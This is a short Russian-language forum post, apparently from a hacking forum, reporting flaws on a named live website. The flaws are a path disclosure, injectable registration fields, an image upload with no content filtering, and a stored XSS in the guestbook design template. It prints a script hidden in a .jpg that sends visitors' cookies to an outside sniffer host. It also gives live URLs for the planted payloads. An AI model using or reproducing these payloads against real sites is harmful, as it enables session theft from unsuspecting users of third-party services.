Так бегло пробежался по Xbase.ru, не чего хорошего нету, только раскрытие пути _http://xbase.ru/inc/main.php Если будет время можно будет глянуть получше
При регистрации Поля: Имя, УРЛ, Фамилия уязвимы... но вставить туда снифер не получится, 20 букв ограничение.. Еше ношёл, что в меню "Загрузка графики" можно создать файл 213.jpg и вписать туда Code: <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> потом загрузить на сайт, фильтрации на содержимое картинки вообще нет. потом просто кидаем линк на картинку и куки идут на снифер, то есть это пасивная xss. но это только для ИЕ Полазил еше не много и нашол активную xss: В меню "Настройка дизайна", дописываем в конец шаблона Code: <script>alert()</script> , теперь заходим в свою гостевую и видем алерт. ставим ковычку в сессию и смотрим исходный путь... Алерт: http://xbase.ru/index.php?nokia1 И картинка которая сворует куки: http://borz.ru/pers/9b/nokia1/12.jpg
